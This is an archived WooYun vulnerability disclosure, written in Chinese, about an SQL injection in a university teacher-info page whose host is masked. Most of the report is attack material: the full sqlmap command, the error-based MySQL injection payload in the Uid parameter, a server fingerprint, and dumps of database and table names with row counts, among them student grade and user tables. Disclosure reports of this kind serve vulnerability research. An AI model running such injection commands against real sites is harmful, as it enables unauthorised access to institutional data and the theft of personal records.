乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-16: 细节已通知厂商并且等待厂商处理中 2016-03-18: 厂商已经主动忽略漏洞,细节向公众公开
如题
target:
http://**.**.**.**/cmeip/teacherinfo/info.php?Uid=24343
error:
payload:
$ python sqlmap.py -u "http://**.**.**.**/cmeip/teacherinfo/info.php?Uid=24343" --random-agent --dbms=mysql --technique=E
sqlmap:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: Uid (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: Uid=24343' AND (SELECT 6939 FROM(SELECT COUNT(*),CONCAT(0x71716b7a71,(SELECT (ELT(6939=6939,1))),0x716b626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WdzW'='WdzW---[21:22:33] [INFO] testing MySQL[21:22:33] [INFO] confirming MySQL[21:22:33] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5back-end DBMS: MySQL >= 5.0.0
databases:
available databases [14]:[*] aacsb[*] ccair[*] cmeip[*] cmeip_new[*] com_ic[*] cssm[*] cssm_en[*] cssm_en_new[*] cssm_ip[*] cssm_new[*] information_schema[*] mysql[*] performance_schema[*] test
tables:
Database: cmeip_new+--------------------+---------+| Table | Entries |+--------------------+---------+| stu_grade | 18170 || class_stu | 3406 || history | 1406 || others | 1372 || core_ability_score | 1304 || `user` | 1190 || userdata | 1190 || prjournals | 1140 || prproceedings | 1105 || apmproceedings | 1104 || international | 480 || conference | 326 || credit | 263 || others1 | 209 || research | 117 || textbooks | 101 || edu | 96 || exp | 96 || books | 90 || teacherdata | 79 || functions | 78 || mono | 72 || photo | 63 || class_teacher | 43 || exam | 33 || purview | 27 || prpresentations | 26 || patent | 16 || chapters | 11 || modules | 11 || semester | 11 || staffnum | 11 || com_class | 9 || core_ability | 8 || announce | 7 || core_ability_group | 4 || facworkshop | 3 || nprjournals | 3 || seminar | 3 || soresearch | 3 || `group` | 1 || news | 1 || online | 1 |+--------------------+---------+Database: ccair+------------------+---------+| Table | Entries |+------------------+---------+| sam_usertime | 346 || sam_userjob | 299 || sam_userlang | 294 || sam_userexpr | 244 || sam_syscode | 226 || sam_sysuser | 168 || sam_userplan | 143 || sam_compjob | 129 || sam_continfo | 128 || sam_usercert | 111 || sam_vw_summer01 | 111 || sam_vw_validjob | 102 || tmp | 101 || sam_userresu | 98 || sam_userbiog | 96 || sam_vw_applyinfo | 86 || sam_userinfo | 80 || sam_sysgrant | 68 || sam_vw_jobcnt | 68 || sam_sysnum | 63 || sam_compinfo | 57 || sam_tracinfo | 40 || sam_sysmenu | 35 || sam_vw_compwait | 8 || sam_sysparams | 6 || sam_pracinfo | 3 || sam_vw_pracjobs | 3 |+------------------+---------+Database: cssm+------------------------------+---------+| Table | Entries |+------------------------------+---------+| grs_tw_stats | 1072494 || grs_eng_stats | 197256 || grs_tw_keywords | 36817 || grs_tw_admin_log | 13436 || grs_eng_admin_log | 2177 || grs_tw_album_gallery | 1295 || grs_eng_keywords | 785 || grs_tw_business_file | 461 || grs_tw_business | 343 || grs_tw_article | 324 || grs_tw_periodical_file | 176 || grs_tw_teaching | 150 || grs_tw_periodical | 84 || grs_eng_album_gallery | 82 || grs_tw_law_file | 82 || grs_tw_faculty | 78 || grs_eng_faculty | 77 || grs_tw_form | 71 || grs_eng_shop_config | 67 || grs_tw_flash_play | 67 || grs_tw_shop_config | 67 || grs_eng_cssm_config | 57 || grs_tw_cssm_config | 57 || grs_eng_article | 53 || grs_tw_album | 49 || grs_tw_law | 48 || grs_tw_friend_link | 45 || grs_tw_communicate | 40 || grs_tw_program | 40 || grs_eng_flash_play | 35 || grs_admin_action | 33 || grs_tw_building | 29 || grs_eng_program | 28 || grs_tw_course | 25 || grs_tw_member | 24 || grs_eng_friend_link | 21 || grs_eng_business_file | 18 || grs_eng_member | 15 || grs_tw_business_cat | 14 || grs_eng_college | 13 || grs_eng_business_cat | 11 || grs_tw_college | 11 || grs_tw_form_cat | 9 || grs_eng_periodical_file | 8 || grs_eng_program_cat | 8 || grs_eng_teaching | 8 || grs_eng_faculty_category | 7 || grs_tw_article_cat | 7 || grs_tw_faculty_category | 7 || grs_tw_law_cat | 7 || grs_eng_album | 6 || grs_eng_album_category | 6 || grs_tw_album_category | 6 || grs_admin_user | 5 || grs_eng_article_cat | 5 || grs_eng_communicate | 5 || grs_tw_building_cat | 4 || grs_eng_communicate_category | 3 || grs_eng_link_category | 3 || grs_tw_communicate_category | 3 || grs_tw_link_category | 3 || grs_tw_program_cat | 3 || grs_eng_course_category | 2 || grs_eng_member_category | 2 || grs_eng_periodical | 2 || grs_eng_teaching_cat | 2 || grs_tw_course_category | 2 || grs_tw_member_category | 2 || grs_tw_teaching_cat | 2 || grs_eng_building | 1 || grs_eng_course | 1 || grs_eng_form | 1 |+------------------------------+---------+Database: aacsb+-------------------+---------+| Table | Entries |+-------------------+---------+| sam_coursescor | 16085 || sam_courselist | 6727 || sam_courseatte | 1134 || sam_vw_coursescor | 208 || sam_coursegoal | 200 || sam_courseinfo | 162 || sam_goalrank | 156 || sam_sysnum | 111 || sam_degreegoal | 83 || sam_sysuser | 68 || sam_sysgrant | 39 || sam_syscode | 28 || sam_sysmenu | 28 || sam_scoreclass | 17 || sam_rankscore | 10 || sam_sysparams | 6 || sam_terminfo | 5 || sam_sysnews | 2 || sam_sysnewslist | 2 |+-------------------+---------+
由以上sqlmap注入出的数据即可证明SQL注入漏洞,可泄露相关数据库信息...
过滤相关参数
危害等级:无影响厂商忽略
忽略时间:2016-03-18 03:33
驗證時該通報頁面已404
暂无